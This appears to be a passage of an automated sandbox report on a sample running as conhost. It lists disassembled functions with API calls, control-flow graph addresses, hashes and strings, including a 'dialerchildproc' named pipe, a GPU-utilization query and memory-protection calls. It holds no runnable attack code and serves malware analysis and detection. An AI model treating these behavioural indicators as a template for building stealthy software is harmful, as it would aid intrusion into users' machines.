                                                          Function 00000146F6B030BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: 5d585a5be9bd6591385c2d8f199e697f28966a6c7565dba158640fd11488ed6b
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: D231B131620B52A6F750CF36B96879967A1B78AF89F0451259ECE43734EF38C86B8701
                                                          Function 00000146F6AD9D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: b7b21a3e1c8c9095850f66e4770d4b6db26ab3a11c71386284aafb31d2ab64c0
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: B0E18B32600B408AEB209F75E4603DD37A2F756B9CF000515EF8D57BAADB34D9AAC702
                                                          Function 00000146F6B0A974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 146f6b0a974-146f6b0a9dc call 146f6b0b844 324 146f6b0a9e2-146f6b0a9e5 321->324 325 146f6b0ae43-146f6b0ae4b call 146f6b0cb78 321->325 324->325 326 146f6b0a9eb-146f6b0a9f1 324->326 328 146f6b0a9f7-146f6b0a9fb 326->328 329 146f6b0aac0-146f6b0aad2 326->329 328->329 333 146f6b0aa01-146f6b0aa0c 328->333 331 146f6b0aad8-146f6b0aadc 329->331 332 146f6b0ad93-146f6b0ad97 329->332 331->332 336 146f6b0aae2-146f6b0aaed 331->336 334 146f6b0ad99-146f6b0ada0 332->334 335 146f6b0add0-146f6b0adda call 146f6b09a64 332->335 333->329 337 146f6b0aa12-146f6b0aa17 333->337 334->325 338 146f6b0ada6-146f6b0adcb call 146f6b0ae4c 334->338 335->325 347 146f6b0addc-146f6b0adfb call 146f6b07d70 335->347 336->332 340 146f6b0aaf3-146f6b0aafa 336->340 337->329 341 146f6b0aa1d-146f6b0aa27 call 146f6b09a64 337->341 338->335 344 146f6b0ab00-146f6b0ab37 call 146f6b09e40 340->344 345 146f6b0acc4-146f6b0acd0 340->345 341->347 355 146f6b0aa2d-146f6b0aa58 call 146f6b09a64 * 2 call 146f6b0a154 341->355 344->345 360 146f6b0ab3d-146f6b0ab45 344->360 345->335 348 146f6b0acd6-146f6b0acda 345->348 352 146f6b0acea-146f6b0acf2 348->352 353 146f6b0acdc-146f6b0ace8 call 146f6b0a114 348->353 352->335 359 146f6b0acf8-146f6b0ad05 call 146f6b09ce4 352->359 353->352 369 146f6b0ad0b-146f6b0ad13 353->369 389 146f6b0aa78-146f6b0aa82 call 146f6b09a64 355->389 390 146f6b0aa5a-146f6b0aa5e 355->390 359->335 359->369 361 146f6b0ab49-146f6b0ab7b 360->361 366 146f6b0acb7-146f6b0acbe 361->366 367 146f6b0ab81-146f6b0ab8c 361->367 366->345 366->361 367->366 370 146f6b0ab92-146f6b0abab 367->370 371 146f6b0ae26-146f6b0ae42 call 146f6b09a64 * 2 call 146f6b0cad8 369->371 372 146f6b0ad19-146f6b0ad1d 369->372 374 146f6b0abb1-146f6b0abf6 call 146f6b0a128 * 2 370->374 375 146f6b0aca4-146f6b0aca9 370->375 371->325 376 146f6b0ad1f-146f6b0ad2e call 146f6b0a114 372->376 377 146f6b0ad30 372->377 402 146f6b0abf8-146f6b0ac1e call 146f6b0a128 call 146f6b0b068 374->402 403 146f6b0ac34-146f6b0ac3a 374->403 381 146f6b0acb4 375->381 385 146f6b0ad33-146f6b0ad3d call 146f6b0b8dc 376->385 377->385 381->366 385->335 400 146f6b0ad43-146f6b0ad91 call 146f6b09d74 call 146f6b09f80 385->400 389->329 406 146f6b0aa84-146f6b0aaa4 call 146f6b09a64 * 2 call 146f6b0b8dc 389->406 390->389 394 146f6b0aa60-146f6b0aa6b 390->394 394->389 399 146f6b0aa6d-146f6b0aa72 394->399 399->325 399->389 400->335 422 146f6b0ac20-146f6b0ac32 402->422 423 146f6b0ac45-146f6b0aca2 call 146f6b0a8a0 402->423 410 146f6b0acab 403->410 411 146f6b0ac3c-146f6b0ac40 403->411 427 146f6b0aaa6-146f6b0aab0 call 146f6b0b9cc 406->427 428 146f6b0aabb 406->428 412 146f6b0acb0 410->412 411->374 412->381 422->402 422->403 423->412 431 146f6b0aab6-146f6b0ae1f call 146f6b096dc call 146f6b0b424 call 146f6b098d0 427->431 432 146f6b0ae20-146f6b0ae25 call 146f6b0cad8 427->432 428->329 431->432 432->371
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: aa89d55c4accde8dcb13383cf65ae189225e251a83136f86e660f75fcebd07b9
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: 97E18F336247409AEB209F35E6503DD3BA4F74678CF106515EE8D57BA6CB34C9AAC702
                                                          Function 00000146F6B0F7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 442 146f6b0f7c4-146f6b0f816 443 146f6b0f907 442->443 444 146f6b0f81c-146f6b0f81f 442->444 447 146f6b0f909-146f6b0f925 443->447 445 146f6b0f829-146f6b0f82c 444->445 446 146f6b0f821-146f6b0f824 444->446 448 146f6b0f8ec-146f6b0f8ff 445->448 449 146f6b0f832-146f6b0f841 445->449 446->447 448->443 450 146f6b0f851-146f6b0f870 LoadLibraryExW 449->450 451 146f6b0f843-146f6b0f846 449->451 452 146f6b0f926-146f6b0f93b 450->452 453 146f6b0f876-146f6b0f87f GetLastError 450->453 454 146f6b0f946-146f6b0f955 GetProcAddress 451->454 455 146f6b0f84c 451->455 452->454 460 146f6b0f93d-146f6b0f940 FreeLibrary 452->460 456 146f6b0f8c6-146f6b0f8d0 453->456 457 146f6b0f881-146f6b0f898 call 146f6b0cd58 453->457 458 146f6b0f957-146f6b0f97e 454->458 459 146f6b0f8e5 454->459 461 146f6b0f8d8-146f6b0f8df 455->461 456->461 457->456 464 146f6b0f89a-146f6b0f8ae call 146f6b0cd58 457->464 458->447 459->448 460->454 461->449 461->459 464->456 467 146f6b0f8b0-146f6b0f8c4 LoadLibraryExW 464->467 467->452 467->456
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: d0bc01c74f2d989dfef83e7198bd61e7a7bc153f5fbff263e1150fdea8a5f6f1
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: 0C41F531335600A1EA16CB36B9247D52795FB07BE8F0461259D8D877A5EF38CC6F9302
                                                          Function 00000146F6B0104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 468 146f6b0104c-146f6b010b9 RegQueryInfoKeyW 469 146f6b010bf-146f6b010c9 468->469 470 146f6b011b5-146f6b011d0 468->470 469->470 471 146f6b010cf-146f6b0111f RegEnumValueW 469->471 472 146f6b011a5-146f6b011af 471->472 473 146f6b01125-146f6b0112a 471->473 472->470 472->471 473->472 474 146f6b0112c-146f6b01135 473->474 475 146f6b01147-146f6b0114c 474->475 476 146f6b01137 474->476 478 146f6b01199-146f6b011a3 475->478 479 146f6b0114e-146f6b01193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 475->479 477 146f6b0113b-146f6b0113f 476->477 477->472 480 146f6b01141-146f6b01145 477->480 478->472 479->478 480->475 480->477
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: bb40d6e8abd852c02028c367b13bf66891fa8df69d9935733b62ef76eea8e135
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 37417033224B80D6E764CF71F45439EB7A1F38AB98F449129DA8907768DF38C95ACB01
                                                          Function 00000146F6B0D498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D50F
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0CC0E,?,?,?,?,?,?,?,?,00000146F6B0D3CD,?,?,00000001), ref: 00000146F6B0D520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: 996b77c17395a368196e081deda9aed75172daacf5eb11d28d564de47ab90674
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 8511843032528061F954973577713E92A55AB463FCF546324ADBD476F6DE28CC3B4603
                                                          Function 00000146F6B02334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: c739c30fb000fc6dd566936c7c7f766d6cb00d8a7846c1e69a9a2f7feea44fdc
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: 1E114C36624B4092E710CB21F55839A6761F38ABE9F504315EA9E02AA8DF7CC95ACB01
                                                          Function 00000146F6B07940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 511 146f6b07940-146f6b07946 512 146f6b07948-146f6b0794b 511->512 513 146f6b07981-146f6b0798b 511->513 515 146f6b0794d-146f6b07950 512->515 516 146f6b07975-146f6b079b4 call 146f6b07ff0 512->516 514 146f6b07aa8-146f6b07abd 513->514 520 146f6b07acc-146f6b07ae6 call 146f6b07e84 514->520 521 146f6b07abf 514->521 518 146f6b07968 __scrt_dllmain_crt_thread_attach 515->518 519 146f6b07952-146f6b07955 515->519 533 146f6b079ba-146f6b079cf call 146f6b07e84 516->533 534 146f6b07a82 516->534 522 146f6b0796d-146f6b07974 518->522 524 146f6b07957-146f6b07960 519->524 525 146f6b07961-146f6b07966 call 146f6b07f34 519->525 531 146f6b07ae8-146f6b07b1d call 146f6b07fac call 146f6b07e4c call 146f6b08348 call 146f6b08160 call 146f6b08184 call 146f6b07fdc 520->531 532 146f6b07b1f-146f6b07b50 call 146f6b081c0 520->532 526 146f6b07ac1-146f6b07acb 521->526 525->522 531->526 543 146f6b07b61-146f6b07b67 532->543 544 146f6b07b52-146f6b07b58 532->544 546 146f6b07a9a-146f6b07aa7 call 146f6b081c0 533->546 547 146f6b079d5-146f6b079e6 call 146f6b07ef4 533->547 537 146f6b07a84-146f6b07a99 534->537 549 146f6b07b69-146f6b07b73 543->549 550 146f6b07bae-146f6b07bc4 call 146f6b03620 543->550 544->543 548 146f6b07b5a-146f6b07b5c 544->548 546->514 563 146f6b07a37-146f6b07a41 call 146f6b08160 547->563 564 146f6b079e8-146f6b07a0c call 146f6b0830c call 146f6b07e3c call 146f6b07e68 call 146f6b0bc3c 547->564 554 146f6b07c4f-146f6b07c5c 548->554 555 146f6b07b7f-146f6b07b8d 549->555 556 146f6b07b75-146f6b07b7d 549->556 571 146f6b07bc6-146f6b07bc8 550->571 572 146f6b07bfc-146f6b07bfe 550->572 561 146f6b07b93-146f6b07ba8 call 146f6b07940 555->561 575 146f6b07c45-146f6b07c4d 555->575 556->561 561->550 561->575 563->534 585 146f6b07a43-146f6b07a4f call 146f6b081b0 563->585 564->563 611 146f6b07a0e-146f6b07a15 __scrt_dllmain_after_initialize_c 564->611 571->572 580 146f6b07bca-146f6b07bec call 146f6b03620 call 146f6b07aa8 571->580 573 146f6b07c00-146f6b07c03 572->573 574 146f6b07c05-146f6b07c1a call 146f6b07940 572->574 573->574 573->575 574->575 594 146f6b07c1c-146f6b07c26 574->594 575->554 580->572 606 146f6b07bee-146f6b07bf3 580->606 602 146f6b07a51-146f6b07a5b call 146f6b080c8 585->602 603 146f6b07a75-146f6b07a80 585->603 599 146f6b07c28-146f6b07c2f 594->599 600 146f6b07c31-146f6b07c41 594->600 599->575 600->575 602->603 610 146f6b07a5d-146f6b07a6b 602->610 603->537 606->572 610->603 611->563 612 146f6b07a17-146f6b07a34 call 146f6b0bbf8 611->612 612->563
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: c9af687361b548b4eaad491780747cf4b424ea6640cf1b26922da5b166fab028
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: 3081D530630645A6FA609B35B6713D9AB90A78778CF1460359ACD437B6EB38CD7F8702
                                                          Function 00000146F6B0A1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A279
                                                          • GetLastError.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: e8590d6370aed672462225ae75ee81d13489462e3fa84f208a3495374f322124
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: 5A31EC32332640F1EE11DB62B9207D52794B70AB68F591935DD9D073B2EF39C96E8302
                                                          Function 00000146F6B141E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: f255b35c95f65c42c6c118fa18959e8d254f17920125addcdd67c98ef20f9961
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 28118231330B4086E7909B62F86435967A4F78AFE8F144215EE9E877B4DF38CD6A8741
                                                          Function 00000146F6B03BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: bb6b63479a83c3cb886e696d7843b8539dd86a6c1a7bade689098b6db90d1d6e
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: 3811CE36320B4192EB248B35F0682A96B61F74AB88F050028DECD03764EF3DCA9AC705
                                                          Function 00000146F6B05F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction ID: 17dc336b67dc88dd0e9cd652521074ffabe4c6f28488ce67a9d1747b74518cf5
                                                          • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction Fuzzy Hash: 5FD1BD36218B8891DB70DB16F5A039A7BA0F389B88F101116EACD47B75DF3CC956DB01
